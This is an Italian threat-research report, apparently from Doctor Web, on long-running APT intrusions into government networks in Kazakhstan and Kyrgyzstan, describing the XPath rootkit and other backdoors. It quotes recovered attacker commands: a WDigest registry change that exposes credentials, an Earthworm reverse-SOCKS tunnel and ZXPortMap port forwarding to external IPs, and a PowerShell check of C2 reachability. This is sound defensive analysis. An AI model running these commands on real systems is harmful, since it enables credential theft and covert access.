20 luglio 2020

Introduzione

Come oggetto di studio, i cyberattacchi mirati a grandi imprese ed enti statali sono di maggiore interesse per i professionisti della sicurezza delle informazioni. Una ricerca su tali incidenti informatici consente di analizzare la strategia e gli strumenti utilizzati dai malintenzionati per la violazione dei sistemi informatici e di elaborare adeguate contromisure. Il software utilizzato negli attacchi mirati è in genere unico in quanto viene sviluppato in conformità agli scopi e gli obiettivi degli attaccanti e non viene pubblicizzato. Rispetto alle minacce di massa, i campioni di tale software solo raramente arrivano nelle mani dei ricercatori. Oltre a ciò, negli attacchi mirati vengono utilizzati meccanismi completi che nascondono le tracce delle attività malevole, il che complica il rilevamento della presenza degli intrusi all'interno dell'infrastruttura dell'organizzazione sotto attacco.

A marzo 2019 all'azienda Doctor Web si è rivolto un cliente da un ente statale della Repubblica del Kazakistan segnalando la presenza del software malevolo su uno dei computer della rete aziendale. Questa richiesta cliente ha dato inizio a una ricerca che ha permesso agli specialisti della nostra azienda di rilevare e descrivere per la prima volta un gruppo di trojan utilizzati per un attacco targeted completo contro un ente. I materiali a nostra disposizione ci hanno consentito di conoscere gli strumenti e gli obiettivi di intrusi penetrati in una rete di computer interna. Nel corso dello studio è stato accertato che l'infrastruttura di rete dell'ente era compromessa almeno da dicembre 2017.

Inoltre, a febbraio 2020 all'azienda Doctor Web si sono rivolti rappresentanti di un ente statale della Repubblica del Kirghizistan con segni di infezione della rete aziendale. Il nostro esame ha individuato la presenza nella rete di una serie di programmi malevoli di cui alcune varianti venivano utilizzate anche nell'attacco all'organizzazione kazaka. L'analisi ha mostrato che, come nel caso suddetto, l'infezione era iniziata molto tempo prima della richiesta fatta dal cliente — ovvero, a marzo 2017.

Considerando che la presenza non autorizzata in entrambe le infrastrutture continuava per almeno tre anni, e inoltre, che esaminando i report dai server, sono state identificate famiglie di trojan completamente diverse, supponiamo che dietro questi attacchi possano esserci più gruppi di hacker. In particolare, alcuni dei trojan utilizzati sono ben conosciuti: una parte di essi sono strumenti esclusivi di noti gruppi APT, altri vengono utilizzati da diversi gruppi APT cinesi.

Informazioni generali sull'attacco e gli strumenti utilizzati

Abbiamo potuto studiare in dettaglio le informazioni provenienti da più server intranet appartenenti agli enti interessati di Kazakistan e Kirghizistan. Tutti i dispositivi considerati nello studio funzionano con i sistemi operativi Microsoft Windows.

I programmi malevoli utilizzati nell'attacco targeted possono essere condizionalmente divisi in due categorie:

• quelli di massa che venivano installati sulla maggior parte dei computer della rete;
• quelli specializzati che venivano installati sui server di particolare interesse per l'attaccante.

I campioni esaminati dei programmi malevoli e le utility impiegate dai malintenzionati consentono di ipotizzare il seguente scenario di attacco. Dopo aver sfruttato con successo le vulnerabilità e aver ottenuto l'accesso a un computer della rete, i malintenzionati caricavano su di esso una delle varianti di trojan della famiglia BackDoor.PlugX. I moduli payload del trojan consentivano di controllare da remoto il computer infettato e utilizzarlo per l'ulteriore avanzamento sulla rete. Un altro trojan presumibilmente utilizzato per l'infezione iniziale era BackDoor.Whitebird.1. Il backdoor era progettato per sistemi operativi a 64 bit e aveva funzionalità abbastanza versatili: il supporto della connessione crittografata al server di gestione, nonché le funzioni del file manager, proxy e controllo remoto tramite la shell dei comandi.

Dopo aver compromesso la rete, il gruppo di hacker utilizzava il software malevolo specializzato per raggiungere gli obiettivi stabiliti. Di seguito è presentata la distribuzione dei trojan specializzati per dispositivo infetto.

Controller di dominio #1:

Trojan.Misics
Trojan.XPath

Controller di dominio #2:

Trojan.Misics
Trojan.Mirage

Controller di dominio #3:

BackDoor.Mikroceen
BackDoor.Logtu

Server #1:

BackDoor.Mikroceen

Server #2:

Trojan.Mirage
BackDoor.CmdUdp.1

Dai trojan sopraindicati, merita una particolare attenzione la famiglia XPath i cui campioni, secondo le nostre informazioni, non sono stati mai descritti pubblicamente in precedenza. La famiglia possiede un rootkit studiato per nascondere l'attività di rete e le tracce della presenza nel sistema compromesso, che è stato possibile rilevare tramite l'antirootkit Dr.Web installato sul server attaccato. I campioni da noi analizzati sono stati compilati negli anni 2017-2018. Questi programmi, a loro volta, si basano su progetti open source rilasciati alcuni anni prima. Così, nei campioni analizzati erano utilizzate le versioni del pacchetto WinDivert degli anni 2013-2015. Ciò indica indirettamente che anche le prime varianti di XPath potrebbero essere state sviluppate in quel periodo.

XPath è un trojan a moduli, ciascun componente del quale corrisponde a una fase specifica del funzionamento del programma malevolo. Il processo di infezione inizia dall'operazione dell'installer di componenti che viene rilevato come Trojan.XPath.1. L'installer applica la configurazione cifrata trascritta nel suo corpo e lancia il payload tramite l'installazione del driver o il metodo COM Hijacking. Il programma utilizza il registro di sistema per la memorizzazione dei suoi moduli impiegando sia la cifratura che la compressione.

Trojan.XPath.2 è driver e serve a nascondere la presenza delle attività malevole nel sistema compromesso eseguendo un altro modulo in parallelo. Il driver ha firme digitali cinesi, e il suo funzionamento è basato su progetti open source. A differenza degli altri componenti che sono conservati nel registro di sistema, i file del driver si trovano sul disco, e il programma funziona di nascosto. Oltre a nascondere il file del driver sul disco, il componente ha il compito di inserire il loader del payload nel processo lsass.exe, nonché mascherare l'attività di rete del trojan. Lo scenario di funzionamento cambia a seconda della versione del sistema operativo.

Il nome originale del terzo componente è PayloadDll.c. La libreria, rilevata come Trojan.XPath.3, è modulo intermedio e serve a inserire il payload salvato nel registro nel processo svhost.exe tramite il metodo COM Hijacking.

Le funzionalità principali sono contenute in un modulo payload, rilevato come Trojan.XPath.4. Il componente è scritto in C++ e anch'esso è basato su progetti open source. Come la maggior parte dei programmi malevoli considerati nello studio, questo trojan è progettato per l'ottenimento dell'accesso non autorizzato ai computer infetti e il furto dei dati riservati. La sua caratteristica è la capacità di funzionamento in due modalità. La prima è il funzionamento in modalità client (Client Mode). In questa modalità il trojan si connette al server di gestione e attende comandi in arrivo. La seconda è il funzionamento in modalità agent (Agent Mode). In questa modalità Trojan.XPath.4 svolge le funzioni del server: è in ascolto su determinate porte aspettando la connessione di altri client e inviando comandi a tali client. Dunque, gli sviluppatori hanno previsto uno scenario di implementazione di un server di gestione locale all'interno della rete attaccata per reindirizzare i comandi del server di gestione esterno ai computer all'interno della rete.

Una descrizione dettagliata del funzionamento dei programmi della famiglia XPath è ritrovabile nella versione PDF dello studio, e inoltre, è disponibile nella libreria di virus Dr.Web.

Tra le altre particolarità interessanti c'è l'implementazione dell'accesso del trojan Mirage alla shell dei comandi. Per reindirizzare l'input/output della shell dei comandi, il programma malevolo utilizza determinati file, i quali abbiamo potuto ottenere dal server infetto. In questo modo è stato possibile vedere i comandi eseguiti dai malintenzionati tramite la funzionalità del trojan presentata e i dati ricevuti in risposta:

reg add HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\Wdigest /v UseLogonCredential /t REG_DWORD /d 1 /f
ipconfig /displaydns
c:\windows\debug\windbg.exe -n 202.74.232.2 -o 53,80,443
c:\windows\debug\windbg.exe -n 202.74.232.2 -o 143,110
reg query HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\Wdigest

Il file windbg.exe avviato è scanner delle porte TCP/UPD PortQry.

Nel corso della ricerca abbiamo rilevato prove che confermano indirettamente il legame tra gli attacchi mirati agli enti statali dell'Asia Centrale. Così, uno dei campioni trovati di BackDoor.PlugX.38 utilizzava come server di gestione il dominio nicodonald[.]accesscam[.]org il quale veniva inoltre utilizzato come server di gestione per BackDoor.Apper.14, anche conosciuto come ICEFOG NG. Alcuni anni fa abbiamo rilevato un backdoor di questa famiglia in una mail di phishing inviata a un ente statale di Kazakistan. Inoltre, il documento RTF che installava questo campione di BackDoor.Apper.14 è stato per la prima volta caricato su VirusTotal da Kazakistan il 19 marzo 2019.

Una particolarità interessante dell'incidente in Kirghizistan era il backdoor Logtu rilevato insieme a Mikroceen su un server infetto. Oltre a un set di malware simile utilizzato dai malintenzionati, proprio Mikroceen ci permette di parlare di un possibile legame tra i due attacchi: un campione di questo backdoor altamente specializzato è stato trovato in entrambe le reti e veniva installato in entrambi i casi sul controller di dominio.

Nel corso della ricerca di campioni relativi a questi attacchi, è stato trovato un backdoor appositamente predisposto che implementa l'accesso BIND Shell alla shell dei comandi. Il percorso ai caratteri di debug contiene il nome del progetto in cinese — 正向马源码, il che può essere indicativo dell'origine corrispondente del trojan.

Oltre ai software malevoli, per l'ulteriore avanzamento sulla rete i malintenzionati utilizzavano le seguenti utility disponibili ad accesso aperto:

• Mimikatz
• TCP Port Scanner V1.2 By WinEggDrop
• Nbtscan
• PsExec
• wmiexec.vbs
• goMS17-010
• ZXPortMap v1.0 By LZX
• Earthworm
• PortQry version 2.0 GOLD

Di seguito sono riportati esempi di esecuzione di alcune delle utility elencate.

• ZXPortMap: vmwared.exe 21 46.105.227.110 53
• Earthworm: cryptsocket.exe -s rssocks -d 137.175.79.212 -e 53

Il gruppo APT anche utilizzava attivamente script PowerShell personalizzati per raccogliere informazioni sul computer infetto, gli altri dispositivi della rete, per verificare i server di gestione dal computer infetto e i simili compiti. Oltre a ciò, abbiamo trovato uno script PowerShell studiato per scaricare da Microsoft Exchange Server tutti i contenuti delle caselle di posta di diversi impiegati dell'organizzazione.

Esempi di alcuni script PowerShell eseguiti sui server infetti:

%COMSPEC% /Q /c tasklist /v >>c:\programdata\2.txt
%COMSPEC% /Q /c systeminfo >>c:\programdata\2.txt
%COMSPEC% /Q /c netstat -nvb    >> c:\programdata\2.txt
powershell -exec bypass -command "& {  foreach($i in 53,80,443){ echo ((new-object Net.Sockets.TcpClient).Connect('v.nnncity.xyz',$i))  "port:"$i } 2 > $null  }" >>c:\programdata\2.txt

Conclusione

Nel corso della ricerca i nostri specialisti sono riusciti a trovare più famiglie di trojan utilizzate in questi attacchi. L'analisi dei campioni e delle attività malevole ha mostrato che l'infrastruttura di rete era stata compromessa molto tempo prima del rilevamento dei primi segni di infezione da parte degli impiegati dell'organizzazione. Purtroppo, questo scenario è uno degli attributi di attacchi APT di successo in quanto risorse significative degli autori di virus sono sempre mirate a nascondere la loro presenza nel sistema.

Il vettore di infezione primario, nonché il quadro generale dell'infezione dell'intera infrastruttura sono rimasti al di fuori dei limiti della ricerca. Siamo sicuri che i trojan descritti nello studio siano solo una parte del malware utilizzato in questi attacchi. I meccanismi utilizzati dagli hacker rendono difficile non solo rilevare un'intrusione non autorizzata, ma anche riavere il controllo sugli oggetti di rete.

Per ridurre al minimo i rischi, è necessario un monitoraggio costante delle risorse intranet, specialmente di quei server che sono di particolare interesse per i malintenzionati — controller di dominio, server di posta, gateway internet. Nel caso di compromissione del sistema, è necessaria un'analisi tempestiva e corretta della situazione per elaborare adeguate contromisure. Doctor Web non solo crea strumenti di protezione antivirus, ma anche fornisce servizi di indagine su incidenti informatici legati a virus, al novero dei quali appartengono anche gli attacchi mirati. Se sospettate un'attività malevola nella rete aziendale, potreste rivolgervi per assistenza qualificata al laboratorio antivirus Doctor Web. Una tempestiva risposta consentirà di minimizzare il danno e prevenire drammatiche conseguenze che comportano gli attacchi informatici mirati.

Indicatori di compromissione.